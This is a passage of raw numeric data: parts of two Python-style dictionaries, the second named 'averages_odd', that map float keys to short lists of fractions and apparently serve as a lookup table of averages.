0.0625], 0.281005859375: [0.484375, 0.515625], 0.470458984375: [0.328125, 0.671875], 0.197021484375: [0.921875, 0.078125], 0.931396484375: [0.421875, 0.578125], 0.304443359375: [0.765625, 0.234375], 0.890380859375: [0.984375, 0.015625], 0.349365234375: [0.796875, 0.203125], 0.702880859375: [0.984375, 0.015625], 0.136474609375: [0.359375, 0.640625], 0.958740234375: [0.703125, 0.296875], 0.7646484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.648193359375: [0.765625, 0.234375], 0.609375: [0.375, 0.625, 0.875, 0.125], 0.829833984375: [0.828125, 0.171875], 0.417724609375: [0.359375, 0.640625], 0.716552734375: [0.453125, 0.546875], 0.075927734375: [0.953125, 0.046875], 0.1318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.265625: [0.375, 0.625, 0.875, 0.125], 0.2958984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.4130859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.784912109375: [0.890625, 0.109375], 0.74609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.2880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.773193359375: [0.765625, 0.234375], 0.521240234375: [0.703125, 0.296875], 0.486083984375: [0.828125, 0.171875], 0.204833984375: [0.828125, 0.171875], 0.542724609375: [0.359375, 0.640625], 0.921630859375: [0.984375, 0.015625], 0.364990234375: [0.296875, 0.703125], 0.144287109375: [0.390625, 0.609375], 0.989990234375: [0.703125, 0.296875], 0.7958984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.679443359375: [0.765625, 0.234375], 0.640625: [0.375, 0.625, 0.875, 0.125], 0.433349609375: [0.859375, 0.140625], 0.747802734375: [0.453125, 0.546875], 0.079833984375: [0.828125, 0.171875], 0.1396484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.5537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.234375: [0.375, 0.625, 0.875, 0.125], 0.027099609375: [0.859375, 0.140625], 0.296630859375: [0.984375, 0.015625], 0.77734375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.312255859375: [0.484375, 0.515625], 0.212646484375: [0.421875, 0.578125], 0.573974609375: [0.359375, 0.640625], 0.5146484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.380615234375: [0.796875, 0.203125], 0.152099609375: [0.859375, 0.140625], 0.472412109375: [0.890625, 0.109375], 0.710693359375: [0.765625, 0.234375], 0.671875: [0.375, 0.625, 0.875, 0.125], 0.259521484375: [0.921875, 0.078125], 0.6318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.448974609375: [0.359375, 0.640625], 0.779052734375: [0.453125, 0.546875], 0.083740234375: [0.296875, 0.703125], 0.1474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.5849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.673583984375: [0.828125, 0.171875], 0.4443359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.847412109375: [0.890625, 0.109375], 0.80859375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.327880859375: [0.984375, 0.015625], 0.853271484375: [0.921875, 0.078125], 0.536865234375: [0.796875, 0.203125], 0.523193359375: [0.765625, 0.234375], 0.976318359375: [0.734375, 0.265625], 0.220458984375: [0.328125, 0.671875], 0.130615234375: [0.796875, 0.203125], 0.556396484375: [0.421875, 0.578125], 0.515625: [0.375, 0.625, 0.875, 0.125], 0.109375: [0.375, 0.625, 0.875, 0.125], 0.396240234375: [0.296875, 0.703125], 0.159912109375: [0.890625, 0.109375], 0.743896484375: [0.421875, 0.578125], 0.8583984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.741943359375: [0.765625, 0.234375], 0.703125: [0.375, 0.625, 0.875, 0.125], 0.275146484375: [0.421875, 0.578125], 0.111083984375: [0.828125, 0.171875], 0.464599609375: [0.859375, 0.140625], 0.810302734375: [0.453125, 0.546875], 0.087646484375: [0.421875, 0.578125], 0.1552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.6162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.878662109375: [0.890625, 0.109375], 0.83984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.343505859375: [0.484375, 0.515625], 0.4912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.228271484375: [0.921875, 0.078125], 0.636474609375: [0.359375, 0.640625], 0.0146484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.306396484375: [0.421875, 0.578125], 0.411865234375: [0.796875, 0.203125], 0.167724609375: [0.359375, 0.640625], 0.638427734375: [0.953125, 0.046875], 0.8896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.058349609375: [0.859375, 0.140625], 0.734375: [0.375, 0.625, 0.875, 0.125], 0.290771484375: [0.921875, 0.078125], 0.480224609375: [0.359375, 0.640625], 0.841552734375: [0.453125, 0.546875], 0.091552734375: [0.453125, 0.546875], 0.1630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.6474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4755859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.909912109375: [0.890625, 0.109375], 0.87109375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.359130859375: [0.984375, 0.015625], 0.599365234375: [0.796875, 0.203125], 0.525146484375: [0.421875, 0.578125], 0.978271484375: [0.921875, 0.078125], 0.0224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.667724609375: [0.359375, 0.640625], 0.060302734375: [0.453125, 0.546875], 0.177490234375: [0.296875, 0.703125], 0.427490234375: [0.296875, 0.703125], 0.175537109375: [0.390625, 0.609375], 0.9208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.804443359375: [0.765625, 0.234375], 0.765625: [0.375, 0.625, 0.875, 0.125], 0.720458984375: [0.328125, 0.671875], 0.587646484375: [0.421875, 0.578125], 0.062255859375: [0.484375, 0.515625], 0.495849609375: [0.859375, 0.140625], 0.872802734375: [0.453125, 0.546875], 0.1708984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.6787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.562255859375: [0.484375, 0.515625], 0.031005859375: [0.484375, 0.515625], 0.941162109375: [0.890625, 0.109375], 0.90234375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.374755859375: [0.484375, 0.515625], 0.630615234375: [0.796875, 0.203125], 0.243896484375: [0.421875, 0.578125], 0.698974609375: [0.359375, 0.640625], 0.761474609375: [0.359375, 0.640625], 0.253662109375: [0.890625, 0.109375], 0.657958984375: [0.328125, 0.671875], 0.12109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.443115234375: [0.796875, 0.203125], 0.183349609375: [0.859375, 0.140625], 0.775146484375: [0.421875, 0.578125], 0.9521484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.835693359375: [0.765625, 0.234375], 0.298583984375: [0.828125, 0.171875], 0.322021484375: [0.921875, 0.078125], 0.788818359375: [0.734375, 0.265625], 0.601318359375: [0.734375, 0.265625], 0.75: [0.5, 0.75, 0.0, 0.25], 0.904052734375: [0.453125, 0.546875], 0.099365234375: [0.203125, 0.796875], 0.1787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.593505859375: [0.484375, 0.515625], 0.972412109375: [0.890625, 0.109375], 0.93359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.390380859375: [0.984375, 0.015625], 0.661865234375: [0.796875, 0.203125], 0.816162109375: [0.890625, 0.109375], 0.527099609375: [0.859375, 0.140625], 0.730224609375: [0.359375, 0.640625], 0.269287109375: [0.390625, 0.609375], 0.458740234375: [0.296875, 0.703125], 0.191162109375: [0.890625, 0.109375], 0.15234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.2646484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.798583984375: [0.828125, 0.171875], 0.9833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.866943359375: [0.765625, 0.234375], 0.828125: [0.375, 0.625, 0.875, 0.125], 0.337646484375: [0.421875, 0.578125], 0.032958984375: [0.328125, 0.671875], 0.935302734375: [0.453125, 0.546875], 0.103271484375: [0.921875, 0.078125], 0.7412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.624755859375: [0.484375, 0.515625], 0.96484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.406005859375: [0.484375, 0.515625], 0.693115234375: [0.796875, 0.203125], 0.884521484375: [0.921875, 0.078125], 0.868896484375: [0.421875, 0.578125], 0.034912109375: [0.890625, 0.109375], 0.284912109375: [0.890625, 0.109375], 0.859375: [0.375, 0.625, 0.875, 0.125], 0.308349609375: [0.859375, 0.140625], 0.474365234375: [0.796875, 0.203125], 0.198974609375: [0.359375, 0.640625], 0.2802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.898193359375: [0.765625, 0.234375], 0.366943359375: [0.765625, 0.234375], 0.353271484375: [0.921875, 0.078125], 0.138427734375: [0.953125, 0.046875], 0.05859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.107177734375: [0.953125, 0.046875], 0.3349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.656005859375: [0.484375, 0.515625], 0.939208984375: [0.671875, 0.328125], 0.99609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.724365234375: [0.796875, 0.203125], 0.952880859375: [0.984375, 0.015625], 0.642333984375: [0.828125, 0.171875], 0.529052734375: [0.453125, 0.546875], 0.1943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.300537109375: [0.390625, 0.609375], 0.046875: [0.375, 0.625, 0.875, 0.125], 0.489990234375: [0.296875, 0.703125], 0.501708984375: [0.328125, 0.671875], 0.206787109375: [0.390625, 0.609375], 0.550537109375: [0.390625, 0.609375], 0.929443359375: [0.765625, 0.234375], 0.890625: [0.625, 0.875, 0.125, 0.375], 0.368896484375: [0.421875, 0.578125], 0.146240234375: [0.296875, 0.703125], 0.997802734375: [0.453125, 0.546875], 0.095458984375: [0.328125, 0.671875], 0.2021484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.8037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.687255859375: [0.484375, 0.515625], 0.697021484375: [0.921875, 0.078125], 0.769287109375: [0.390625, 0.609375], 0.437255859375: [0.484375, 0.515625], 0.755615234375: [0.796875, 0.203125], 0.5615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8271484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.823974609375: [0.359375, 0.640625], 0.316162109375: [0.890625, 0.109375], 0.27734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.712646484375: [0.421875, 0.578125], 0.1865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.5224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.984130859375: [0.984375, 0.015625], 0.214599609375: [0.859375, 0.140625], 0.3115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.581787109375: [0.390625, 0.609375], 0.960693359375: [0.765625, 0.234375], 0.921875: [0.625, 0.875, 0.125, 0.375], 0.384521484375: [0.921875, 0.078125], 0.038818359375: [0.265625, 0.734375], 0.751708984375: [0.671875, 0.328125], 0.114990234375: [0.296875, 0.703125], 0.2099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.8349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.718505859375: [0.484375, 0.515625], 0.765380859375: [0.984375, 0.015625], 0.8818359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.452880859375: [0.984375, 0.015625], 0.786865234375: [0.796875, 0.203125], 0.5927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.531005859375: [0.484375, 0.515625], 0.855224609375: [0.640625, 0.359375], 0.331787109375: [0.390625, 0.609375], 0.792724609375: [0.359375, 0.640625], 0.544677734375: [0.953125, 0.046875], 0.726318359375: [0.734375, 0.265625], 0.222412109375: [0.890625, 0.109375], 0.18359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.3271484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.613037109375: [0.390625, 0.609375], 0.991943359375: [0.765625, 0.234375], 0.953125: [0.375, 0.625, 0.875, 0.125], 0.040771484375: [0.921875, 0.078125], 0.118896484375: [0.421875, 0.578125], 0.2177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.749755859375: [0.484375, 0.515625], 0.279052734375: [0.453125, 0.546875], 0.468505859375: [0.484375, 0.515625], 0.818115234375: [0.796875, 0.203125], 0.6240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.923583984375: [0.828125, 0.171875], 0.886474609375: [0.640625, 0.359375], 0.347412109375: [0.890625, 0.109375], 0.30859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.575927734375: [0.953125, 0.046875], 0.263427734375: [0.953125, 0.046875], 0.876708984375: [0.671875, 0.328125], 0.230224609375: [0.359375, 0.640625], 0.3427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.644287109375: [0.390625, 0.609375], 0.564208984375: [0.328125, 0.671875], 0.984375: [0.625, 0.875, 0.125, 0.375], 0.415771484375: [0.921875, 0.078125], 0.042724609375: [0.359375, 0.640625], 0.888427734375: [0.953125, 0.046875], 0.993896484375: [0.421875, 0.578125], 0.122802734375: [0.453125, 0.546875], 0.2255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.8974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.781005859375: [0.484375, 0.515625], 0.294677734375: [0.953125, 0.046875], 0.484130859375: [0.984375, 0.015625], 0.849365234375: [0.796875, 0.203125], 0.605224609375: [0.359375, 0.640625], 0.532958984375: [0.328125, 0.671875], 0.025146484375: [0.421875, 0.578125], 0.0302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.917724609375: [0.640625, 0.359375], 0.036865234375: [0.796875, 0.203125], 0.607177734375: [0.953125, 0.046875], 0.140380859375: [0.984375, 0.015625], 0.003662109375: [0.890625, 0.109375], 0.238037109375: [0.390625, 0.609375], 0.3583984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.675537109375: [0.390625, 0.609375], 0.431396484375: [0.421875, 0.578125], 0.044677734375: [0.953125, 0.046875], 0.2333984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.812255859375: [0.484375, 0.515625], 0.310302734375: [0.453125, 0.546875], 0.970458984375: [0.671875, 0.328125], 0.499755859375: [0.484375, 0.515625], 0.880615234375: [0.796875, 0.203125], 0.6865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.570068359375: [0.734375, 0.265625], 0.948974609375: [0.359375, 0.640625], 0.378662109375: [0.890625, 0.109375], 0.33984375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.066162109375: [0.890625, 0.109375], 0.171875: [0.375, 0.625, 0.875, 0.125], 0.011474609375: [0.359375, 0.640625], 0.3740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.706787109375: [0.390625, 0.609375], 0.257568359375: [0.265625, 0.734375], 0.447021484375: [0.921875, 0.078125], 0.185302734375: [0.453125, 0.546875], 0.023193359375: [0.234375, 0.765625], 0.2412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.843505859375: [0.484375, 0.515625], 0.423583984375: [0.828125, 0.171875], 0.325927734375: [0.953125, 0.046875], 0.728271484375: [0.921875, 0.078125], 0.837646484375: [0.421875, 0.578125], 0.911865234375: [0.796875, 0.203125], 0.7177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.503662109375: [0.890625, 0.109375], 0.5625: [0.5, 0.75, 0.0, 0.25], 0.947021484375: [0.921875, 0.078125], 0.980224609375: [0.640625, 0.359375], 0.394287109375: [0.390625, 0.609375], 0.669677734375: [0.953125, 0.046875], 0.070068359375: [0.265625, 0.734375], 0.52734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.03125: [0.25, 0.5, 0.75, 0.0], 0.3896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.738037109375: [0.390625, 0.609375], 0.273193359375: [0.765625, 0.234375], 0.907958984375: [0.671875, 0.328125], 0.462646484375: [0.421875, 0.578125], 0.193115234375: [0.796875, 0.203125], 0.782958984375: [0.671875, 0.328125], 0.2490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.9912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.874755859375: [0.484375, 0.515625], 0.341552734375: [0.453125, 0.546875], 0.132568359375: [0.265625, 0.734375], 0.851318359375: [0.734375, 0.265625], 0.943115234375: [0.796875, 0.203125], 0.7490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.632568359375: [0.734375, 0.265625], 0.59375: [0.5, 0.75, 0.0, 0.25], 0.409912109375: [0.890625, 0.109375], 0.37109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.700927734375: [0.953125, 0.046875], 0.073974609375: [0.359375, 0.640625], 0.421630859375: [0.984375, 0.015625], 0.142333984375: [0.828125, 0.171875], 0.050537109375: [0.390625, 0.609375], 0.288818359375: [0.265625, 0.734375], 0.25: [0.5, 0.75, 0.0, 0.25], 0.611083984375: [0.828125, 0.171875], 0.478271484375: [0.921875, 0.078125], 0.200927734375: [0.953125, 0.046875], 0.540771484375: [0.921875, 0.078125], 0.8125: [0.5, 0.75, 0.0, 0.25], 0.906005859375: [0.484375, 0.515625], 0.357177734375: [0.953125, 0.046875], 0.400146484375: [0.421875, 0.578125]}
averages_odd={0.0: [0.25, 0.5, 0.75, 0.0], 0.001708984375: [0.328125, 0.671875], 0.216552734375: [0.453125, 0.546875], 0.974365234375: [0.796875, 0.203125], 0.0068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.029052734375: [0.453125, 0.546875], 0.505615234375: [0.796875, 0.203125], 0.0693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.681396484375: [0.421875, 0.578125], 0.425537109375: [0.390625, 0.609375], 0.732177734375: [0.953125, 0.046875], 0.892333984375: [0.828125, 0.171875], 0.5380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.915771484375: [0.921875, 0.078125], 0.5: [0.5, 0.75, 0.0, 0.25], 0.4208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.800537109375: [0.390625, 0.609375], 0.595458984375: [0.671875, 0.328125], 0.493896484375: [0.421875, 0.578125], 0.052490234375: [0.296875, 0.703125], 0.966552734375: [0.453125, 0.546875], 0.558349609375: [0.859375, 0.140625], 0.007568359375: [0.265625, 0.734375], 0.937255859375: [0.484375, 0.515625], 0.372802734375: [0.453125, 0.546875], 0.148193359375: [0.234375, 0.765625], 0.568115234375: [0.796875, 0.203125], 0.8115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.695068359375: [0.734375, 0.265625], 0.65625: [0.5, 0.75, 0.0, 0.25], 0.251708984375: [0.328125, 0.671875], 0.441162109375: [0.890625, 0.109375], 0.40234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.154052734375: [0.453125, 0.546875], 0.081787109375: [0.390625, 0.609375], 0.650146484375: [0.421875, 0.578125], 0.5693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.4365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.831787109375: [0.390625, 0.609375], 0.320068359375: [0.265625, 0.734375], 0.28125: [0.25, 0.5, 0.75, 0.0], 0.7802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.625: [0.5, 0.75, 0.0, 0.25], 0.054443359375: [0.234375, 0.765625], 0.589599609375: [0.859375, 0.140625], 0.968505859375: [0.484375, 0.515625], 0.388427734375: [0.953125, 0.046875], 0.156005859375: [0.484375, 0.515625], 0.8427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.507568359375: [0.734375, 0.265625], 0.0771484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.267333984375: [0.828125, 0.171875], 0.456787109375: [0.390625, 0.609375], 0.794677734375: [0.953125, 0.046875], 0.085693359375: [0.765625, 0.234375], 0.6005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.53125: [0.5, 0.75, 0.0, 0.25], 0.24609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.4521484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.863037109375: [0.390625, 0.609375], 0.335693359375: [0.765625, 0.234375], 0.296875: [0.375, 0.625, 0.875, 0.125], 0.552490234375: [0.703125, 0.296875], 0.224365234375: [0.796875, 0.203125], 0.620849609375: [0.859375, 0.140625], 0.1240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.999755859375: [0.484375, 0.515625], 0.404052734375: [0.453125, 0.546875], 0.163818359375: [0.265625, 0.734375], 0.759521484375: [0.921875, 0.078125], 0.125: [0.25, 0.5, 0.75, 0.0], 0.8740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.757568359375: [0.734375, 0.265625], 0.71875: [0.5, 0.75, 0.0, 0.25], 0.282958984375: [0.328125, 0.671875], 0.015380859375: [0.984375, 0.015625], 0.825927734375: [0.953125, 0.046875], 0.089599609375: [0.859375, 0.140625], 0.407958984375: [0.328125, 0.671875], 0.4677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.894287109375: [0.390625, 0.609375], 0.351318359375: [0.734375, 0.265625], 0.3125: [0.25, 0.5, 0.75, 0.0], 0.583740234375: [0.703125, 0.296875], 0.665771484375: [0.921875, 0.078125], 0.232177734375: [0.953125, 0.046875], 0.017333984375: [0.828125, 0.171875], 0.652099609375: [0.859375, 0.140625], 0.814208984375: [0.671875, 0.328125], 0.419677734375: [0.953125, 0.046875], 0.171630859375: [0.984375, 0.015625], 0.9052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.509521484375: [0.921875, 0.078125], 0.0849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.009521484375: [0.921875, 0.078125], 0.736083984375: [0.828125, 0.171875], 0.488037109375: [0.390625, 0.609375], 0.857177734375: [0.953125, 0.046875], 0.093505859375: [0.484375, 0.515625], 0.236083984375: [0.828125, 0.171875], 0.6630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.546630859375: [0.984375, 0.015625], 0.4833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.925537109375: [0.390625, 0.609375], 0.208740234375: [0.296875, 0.703125], 0.328125: [0.375, 0.625, 0.875, 0.125], 0.614990234375: [0.296875, 0.703125], 0.048583984375: [0.828125, 0.171875], 0.239990234375: [0.296875, 0.703125], 0.683349609375: [0.859375, 0.140625], 0.572021484375: [0.921875, 0.078125], 0.806396484375: [0.421875, 0.578125], 0.435302734375: [0.453125, 0.546875], 0.179443359375: [0.765625, 0.234375], 0.140625: [0.375, 0.625, 0.875, 0.125], 0.9365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.820068359375: [0.734375, 0.265625], 0.78125: [0.5, 0.75, 0.0, 0.25], 0.314208984375: [0.328125, 0.671875], 0.46484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.097412109375: [0.890625, 0.109375], 0.6943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.577880859375: [0.984375, 0.015625], 0.566162109375: [0.890625, 0.109375], 0.4990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.956787109375: [0.390625, 0.609375], 0.382568359375: [0.734375, 0.265625], 0.34375: [0.5, 0.75, 0.0, 0.25], 0.646240234375: [0.703125, 0.296875], 0.626708984375: [0.328125, 0.671875], 0.247802734375: [0.453125, 0.546875], 0.714599609375: [0.859375, 0.140625], 0.261474609375: [0.359375, 0.640625], 0.02734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.7568359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.450927734375: [0.953125, 0.046875], 0.187255859375: [0.484375, 0.515625], 0.2568359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.0458984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.9677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.511474609375: [0.359375, 0.640625], 0.0927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.329833984375: [0.828125, 0.171875], 0.126708984375: [0.328125, 0.671875], 0.919677734375: [0.953125, 0.046875], 0.101318359375: [0.265625, 0.734375], 0.161865234375: [0.796875, 0.203125], 0.7255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.609130859375: [0.984375, 0.015625], 0.0625: [0.25, 0.5, 0.75, 0.0], 0.579833984375: [0.828125, 0.171875], 0.988037109375: [0.390625, 0.609375], 0.398193359375: [0.765625, 0.234375], 0.359375: [0.375, 0.625, 0.875, 0.125], 0.677490234375: [0.703125, 0.296875], 0.745849609375: [0.859375, 0.140625], 0.277099609375: [0.859375, 0.140625], 0.466552734375: [0.453125, 0.546875], 0.195068359375: [0.265625, 0.734375], 0.15625: [0.25, 0.5, 0.75, 0.0], 0.2724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.822021484375: [0.921875, 0.078125], 0.9990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.882568359375: [0.734375, 0.265625], 0.84375: [0.5, 0.75, 0.0, 0.25], 0.345458984375: [0.328125, 0.671875], 0.134521484375: [0.921875, 0.078125], 0.49609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.950927734375: [0.953125, 0.046875], 0.105224609375: [0.359375, 0.640625], 0.363037109375: [0.390625, 0.609375], 0.640380859375: [0.984375, 0.015625], 0.413818359375: [0.734375, 0.265625], 0.375: [0.5, 0.75, 0.0, 0.25], 0.708740234375: [0.703125, 0.296875], 0.763427734375: [0.953125, 0.046875], 0.777099609375: [0.859375, 0.140625], 0.292724609375: [0.359375, 0.640625], 0.43359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.482177734375: [0.953125, 0.046875], 0.202880859375: [0.984375, 0.015625], 0.790771484375: [0.921875, 0.078125], 0.534912109375: [0.890625, 0.109375], 0.663818359375: [0.734375, 0.265625], 0.513427734375: [0.953125, 0.046875], 0.1005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.361083984375: [0.828125, 0.171875], 0.603271484375: [0.921875, 0.078125], 0.0615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.109130859375: [0.984375, 0.015625], 0.7880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.671630859375: [0.984375, 0.015625], 0.429443359375: [0.765625, 0.234375], 0.390625: [0.375, 0.625, 0.875, 0.125], 0.739990234375: [0.703125, 0.296875], 0.5458984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.808349609375: [0.859375, 0.140625], 0.845458984375: [0.671875, 0.328125], 0.077880859375: [0.984375, 0.015625], 0.861083984375: [0.828125, 0.171875], 0.497802734375: [0.453125, 0.546875], 0.210693359375: [0.234375, 0.765625], 0.3037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.548583984375: [0.828125, 0.171875], 0.945068359375: [0.734375, 0.265625], 0.90625: [0.5, 0.75, 0.0, 0.25], 0.376708984375: [0.328125, 0.671875], 0.150146484375: [0.421875, 0.578125], 0.113037109375: [0.390625, 0.609375], 0.8193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.255615234375: [0.796875, 0.203125], 0.445068359375: [0.265625, 0.734375], 0.40625: [0.5, 0.75, 0.0, 0.25], 0.771240234375: [0.703125, 0.296875], 0.900146484375: [0.421875, 0.578125], 0.5771484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.839599609375: [0.859375, 0.140625], 0.323974609375: [0.359375, 0.640625], 0.913818359375: [0.734375, 0.265625], 0.875: [0.5, 0.75, 0.0, 0.25], 0.218505859375: [0.484375, 0.515625], 0.3193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.597412109375: [0.890625, 0.109375], 0.55859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.515380859375: [0.984375, 0.015625], 0.9375: [0.5, 0.75, 0.0, 0.25], 0.392333984375: [0.828125, 0.171875], 0.157958984375: [0.328125, 0.671875], 0.116943359375: [0.234375, 0.765625], 0.8505859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.734130859375: [0.984375, 0.015625], 0.078125: [0.375, 0.625, 0.875, 0.125], 0.954833984375: [0.828125, 0.171875], 0.634521484375: [0.921875, 0.078125], 